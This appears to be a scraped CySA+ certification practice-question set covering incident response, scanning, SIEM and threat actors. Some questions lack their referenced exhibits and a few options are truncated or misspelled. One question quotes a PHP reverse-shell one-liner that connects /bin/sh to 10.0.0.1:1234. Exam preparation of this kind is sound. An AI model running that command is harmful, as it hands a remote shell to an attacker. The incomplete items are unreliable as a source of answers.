CYSA 4

An organization receives a legal hold request from an attorney. The request pertains to emails related to a disputed vendor contract. Which of the following is the best step for the security team to take to ensure compliance with the request?. Publicly disclose the request to other vendors. Notify the departments involved to preserve potentially. Establish a chain of custody starting with the attorney's request. Back up the mailboxes on the server and provide the attorney with a copy.

A company has the following security requirements: • No public IPs • All data secured at rest • No insecure ports/protocols After a cloud scan is completed a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output: Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?. VM_PRD_DB. VM_DEV_DB. VM_DEV_Web02. VM_PRD_Web01.

Which of the following best describes the actions taken by an organization after the resolution of an incident that addresses issues and reflects on the growth opportunities for future incidents?. Lessons learned. Scrum review. Root cause analysis. Regulatory compliance.

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?. Impact. Vulnerability score. Mean time to detect. Isolation.

To minimize the impact of a security incident, a cybersecurity analyst has configured audit settings in the organization’s cloud services. Which of the following security controls has the analyst configured?. Preventive. Corrective. Directive. Detective.

A web developer reports the following error that appeared on a development server when testing a new application: Which of the following tools can be used to identify the application’s point of failure?. OpenVAS. Angry IP scanner. Immunity debugger. Burp Suite.

Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment?. MOU. NDA. BIA. SLA.

A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?. Block the attacks using firewall rules. Deploy an IPS in the perimeter network. Roll out a CDN. Implement a load balancer.

An analyst is reviewing system logs while threat hunting: Which of the following hosts should be investigated first?. PC1. PC2. PC3. PC4. PC5.

An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?. DLP. NAC. EDR. NIDS.

A regulated organization experienced a security breach that exposed a list of customer names with corresponding PII data. Which of the following is the best reason for developing the organization's communication plans?. For the organization's public relations department to have a standard notification. To ensure incidents are immediately reported to a regulatory agency. To automate the notification to customers who were impacted by the breach. To have approval from executive leadership on when communication should occur.

Following an incident, a security analyst needs to create a script for downloading the configuration of all assets from the cloud tenancy. Which of the following authentication methods should the analyst use?. MFA. User and password. PAM. Key pair.

A penetration tester is conducting a test on an organization's software development website. The penetration tester sends the following request to the web interface: Which of the following exploits is most likely being attempted?. SQL injection. Local file inclusion. Cross-site scripting. Directory traversal.

Two employees in the finance department installed a freeware application that contained embedded malware. The network is robustly segmented based on areas of responsibility. These computers had critical sensitive information stored locally that needs to be recovered. The department manager advised all department employees to turn off their computers until the security team could be contacted about the issue. Which of the following is the first step the incident response staff members should take when they arrive?. Turn on all systems, scan for infection, and back up data to a USB storage device. Identify and remove the software installed on the impacted systems in the department. Explain that malware cannot truly be removed and then reimage the devices. Log on to the impacted systems with an administrator account that has privileges to perform backups. Segment the entire department from the network and review each computer offline.

A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment. Which of the following must be considered to ensure the consultant does no harm to operations?. Employing Nmap Scripting Engine scanning techniques. Preserving the state of PLC ladder logic prior to scanning. Using passive instead of active vulnerability scans. Running scans during off-peak manufacturing hours.

A team of analysts is developing a new internal system that correlates information from a variety of sources, analyzes that information, and then triggers notifications according to company policy. Which of the following technologies was deployed?. SIEM. SOAR. IPS. CERT.

Which of following would best mitigate the effects of a new ransomware attack that was not properly stopped by the company antivirus?. Install a firewall. Implement vulnerability management. Deploy sandboxing. Update the application blocklist.

A Chief Information Security Officer wants to implement security by design, starting with the implementation of a security scanning method to identify vulnerabilities, including SQL injection, RFI, XSS, etc. Which of the following would most likely meet the requirement?. Reverse engineering. Known environment testing. Dynamic application security testing. Code debugging.

A security analyst scans a host and generates the following output: Which of the following best describes the output?. The host is unresponsive to the ICMP request. The host is running a vulnerable mail server. The host is allowing unsecured FTP connections. The host is vulnerable to web-based exploits.

The security team at a company, which was a recent target of ransomware, compiled a list of hosts that were identified as impacted and in scope for this incident. Based on the following host list: Which of the following systems was most pivotal to the threat actor in its distribution of the encryption binary via Group Policy?. SQL01. WK10-Sales07. WK7-Plant01. DCEast01. HQAdmin9.

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASE to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?. SIEM ingestion logs are reduced by 20%. Phishing alerts drop by 20%. False positive rates drop to 20%. The MTTR decreases by 20%.

Which of the following threat actors is most likely to target a company due to its questionable environmental policies?. Hacktivist. Organized crime. Nation-state. Lone wolf.

A cybersecurity analyst is recording the following details: • ID • Name • Description • Classification of information • Responsible party In which of the following documents is the analyst recording this information?. Risk register. Change control documentation. Incident response playbook. Incident response plan.

A SOC manager is establishing a reporting process to manage vulnerabilities. Which of the following would be the best solution to identify potential loss incurred by an issue?. Trends. Risk score. Mitigation. Prioritization.

While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following should be checked first?. If appropriate logging levels are set. NTP configuration on each system. Behavioral correlation settings. Data normalization rules.

During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a WAF. Which of the following best represents the change to overall risk associated with this vulnerability?. The risk would not change because network firewalls are in use. The risk would decrease because RDP is blocked by the firewall. The risk would decrease because a web application firewall is in place. The risk would increase because the host is external facing.

Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Choose two.). Performing dynamic application security testing. Reviewing the code. Fuzzing the application. Debugging the code. Implementing a coding standard. Implementing IDS.

A security analyst is trying to validate the results of a web application scan with Burp Suite. The security analyst performs the following: Which of the following vulnerabilities is the security analyst trying to validate?. SQL injection. LFI. XSS. CSRF.

A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls and two-factor authentication. Which of the following does this most likely describe?. System hardening. Hybrid network architecture. Continuous authorization. Secure access service edge.

A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?. Offline storage. Evidence collection. Integrity validation. Legal hold.

An analyst investigated a website and produced the following: Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?. nmap -sS -T4 -F insecure.org. nmap -C insecure.org. nmap -sV -T4 -F insecure.org. nmap -A insecure.org.

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?. The NTP server is not configured on the host. The cybersecurity analyst is looking at the wrong information. The firewall is using UTC time. The host with the logs is offline.

A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?. Scan the employee's computer with virus and malware tools. Review the actions taken by the employee and the email related to the event. Contact human resources and recommend the termination of the employee. Assign security awareness training to the employee involved in the incident.

A security analyst has found the following suspicious DNS traffic while analyzing a packet capture: • DNS traffic while a tunneling session is active. • The mean time between queries is less than one second. • The average query length exceeds 100 characters. Which of the following attacks most likely occurred?. DNS exfiltration. DNS spoofing. DNS zone transfer. DNS poisoning.

A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?. Corrective controls. Compensating controls. Operational controls. Administrative controls.

During the log analysis phase, the following suspicious command is detected: Which of the following is being attempted?. Buffer overflow. RCE. ICMP tunneling. Smurf attack.

An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?. DKIM. SPF. SMTP. DMARC.

A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection?. XDR logs. Firewall legs. IDS logs. MFA logs.

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?. To provide metrics and test continuity controls. To verify the roles of the incident response team. To provide recommendations for handling vulnerabilities. To perform tests against implemented security controls.

A security analyst has prepared a vulnerability scan that contains all of the company’s functional subnets. During the initial scan users reported that network printers began to print pages that contained unreadable text and icons. Which of the following should the analyst do to ensure this behavior does not occur during subsequent vulnerability scans?. Perform non-credentialed scans. Ignore embedded web server ports. Create a tailored scan for the printer subnet. Increase the threshold length of the scan timeout.

A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: • Must use minimal network bandwidth • Must use minimal host resources • Must provide accurate, near real-time updates • Must not have any stored credentials in configuration on the scanner Which of the following vulnerability scanning methods should be used to best meet these requirements?. Internal. Agent. Active. Uncredentialed.

An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?. RFI. LFI. CSRF. XSS.

Which of the following does "federation" most likely refer to within the context of identity and access management?. Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access. An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains. Utilizing a combination of what you know who you are, and what you have to grant authentication to a user. Correlating one's identity with the attributes and associated applications the user has access to.

The Chief Information Security Officer for an organization recently received approval to install a new EDR solution. Following the installation, the number of alerts that require remediation by an analyst has tripled. Which of the following should the organization utilize to best centralize the workload for the internal security team? (Choose two.). SOAR. SIEM. MSP. NGFW. XDR. DLP.

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?. Hacktivist threat. Advanced persistent threat. Unintentional insider threat. Nation-state threat.

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware based on its telemetry?. Cross-reference the signature with open-source threat intelligence. Configure the EDR to perform a full scan. Transfer the malware to a sandbox environment. Log in to the affected systems and run netstat.

A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?. A local red team member is enumerating the local RFC1918 segment to enumerate hosts. A threat actor has a foothold on the network and is sending out control beacons. An administrator executed a new database replication process without notifying the SOC. An insider threat actor is running Responder on the local segment, creating traffic replication.

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?. Risk register. Vulnerability assessment. Penetration test. Compliance report.

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?. Log retention. Log rotation. Maximum log size. Threshold value.

While reviewing web server logs, a security analyst discovers the following suspicious line: php -r ’$socket=fsockopen("10.0.0.1", 1234); passthru ("/bin/sh -i <&3 >&3 2>&3");’ Which of the following is being attempted?. Remote file inclusion. Command injection. Server-side request forgery. Reverse shell.

Which of the following should be updated after a lessons-learned review?. Disaster recovery plan. Business continuity plan. Tabletop exercise. Incident response plan.

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?. Perform static analyses using an integrated development environment. Deploy compensating controls into the environment. Implement server-side logging and automatic updates. Conduct regular code reviews using OWASP best practices.